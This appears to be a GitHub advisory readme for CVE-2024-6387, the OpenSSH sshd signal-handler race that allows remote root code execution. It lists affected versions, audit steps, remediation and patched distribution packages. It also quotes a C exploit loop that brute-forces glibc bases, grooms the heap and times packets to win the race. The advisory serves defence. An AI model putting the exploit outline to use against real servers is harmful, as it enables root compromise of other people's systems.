Skip to content

Latest commit

 

History

History
135 lines (110 loc) · 8 KB

readme.md

File metadata and controls

135 lines (110 loc) · 8 KB

CVE-2024-6387: Openssh: Possible Remote Code Execution Due To A Race Condition In Signal Handling

  • Assigner: redhat
  • Published: 2024-07-01T12:37:25.431Z
  • Updated: 2024-07-01T12:37:25.431Z
  • Score: 8.1 (HIGH) [cvssV3_1]

Summary:

A signal handler race condition has been discovered in OpenSSH's server (sshd).

This issue can occur when a client fails to authenticate to the SSH server within the specified LoginGraceTime (default 120 seconds, previously 600 seconds in older OpenSSH versions). When the LoginGraceTime expires, the SIGALRM handler in sshd is called asynchronously, and the problem arises from calling unsafe functions within this SIGALRM handler.

To exploit this vulnerability, an attacker must leverage the signal handler race condition, which requires a timing attack and memory manipulation. An attacker can use this to execute arbitrary code remotely with root privileges, posing a significant security threat to the system.

Below is an example taken from this github repo that outlines the steps an attacker might take to exploit this vulnerability:

int perform_exploit(const char *ip, int port) {
    int success = 0;
    double parsing_time = 0;
    double timing_adjustment = 0;

    for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++) {
        uint64_t glibc_base = GLIBC_BASES[base_idx];
        printf("Attempting exploitation with glibc base: 0x%lx\n", glibc_base);

        for (int attempt = 0; attempt < 10000 && !success; attempt++) {
            if (attempt % 1000 == 0) {
                printf("Attempt %d of 10000\n", attempt);
            }

            int sock = setup_connection(ip, port);
            if (sock < 0) {
                fprintf(stderr, "Failed to establish connection, attempt %d\n", attempt);
                continue;
            }

            if (perform_ssh_handshake(sock) < 0) {
                fprintf(stderr, "SSH handshake failed, attempt %d\n", attempt);
                close(sock);
                continue;
            }

            prepare_heap(sock);
            time_final_packet(sock, &parsing_time);

            // Implement feedback-based timing strategy
            parsing_time += timing_adjustment;

            if (attempt_race_condition(sock, parsing_time, glibc_base)) {
                printf("Possible exploitation success on attempt %d with glibc base 0x%lx!\n", attempt, glibc_base);
                success = 1;
                // In a real exploit, we would now attempt to interact with the shell
            } else {
                // Adjust timing based on feedback
                timing_adjustment += 0.00001; // Small incremental adjustment
            }

            close(sock);
            usleep(100000); // 100ms delay between attempts
        }
    }

    return success;
}

Affected:

  • OpenSSH versions earlier than 4.4p1 (unless patched for CVE-2006-5051 and CVE-2008-4109)
  • OpenSSH versions 8.5p1 to 9.7p1, but not including, 9.8, 9.8p1

Audit:

  1. Verify that SSH is accessible from public networks.
  2. Verify that a vulnerable version of OpenSSH is in use.

Remediation:

  • Apply the latest available update for the OpenSSH server (version 9.8p1), which fixes the vulnerability.
  • Restrict SSH access using network-based controls such as firewalls and implement network segmentation to prevent lateral movement.
  • If the OpenSSH server cannot be updated immediately, set the 'LoginGraceTime' to 0 in the sshd configuration file, but note that this can expose the server to denial-of-service attacks.
  • For container-based applications, ensure that remote shell access services (e.g., sshd, rlogin, vnc) are not running, regardless of the vulnerability.
  • OpenSSH 4.4p1 is typically found in RedHat-based systems such as RedHat 4 and 5. If you are using such systems, they should be replaced with the latest OS.

Note:

  • Below are commonly used Linux OS versions that are vulnerable to CVE-2024-6387 and their patch information.
  • The CVE-2024-6387 vulnerability for RedHat Enterprise Linux 9 has been changed to CVE-2024-6409 (2024.07.08)
no Vulnerable OS Patched Version Security Advisory
1 Ubuntu 24.04 openssh-client - 1:9.6p1-3ubuntu13.3
openssh-server - 1:9.6p1-3ubuntu13.3		 https://ubuntu.com/security/notices/USN-6859-1
2 Ubuntu 23.10 openssh-client - 1:9.3p1-1ubuntu3.6
openssh-server - 1:9.3p1-1ubuntu3.6		 https://ubuntu.com/security/notices/USN-6859-1
3 Ubuntu 22.04 openssh-client - 1:8.9p1-3ubuntu0.10
openssh-server - 1:8.9p1-3ubuntu0.10		 https://ubuntu.com/security/notices/USN-6859-1
4 AmazonLinux 2023 openssh-client - 8.7p1-8.amzn2023.0.11
openssh-server - 8.7p1-8.amzn2023.0.11		 https://explore.alas.aws.amazon.com/CVE-2024-6387.html
5 RedHat Enterprise Linux 9 No patch released yet (2024.07.08) CVE-2024-6387 changed to CVE-2024-6409 (RedHat Enterprise Linux 9 only
https://access.redhat.com/security/cve/CVE-2024-6409
6 Rocky Linux 9 openssh-8.7p1-38.el9_4.security.0.5 https://rockylinux.org/news/2024-07-01-openssh-sigalrm-regression

Tools:

References: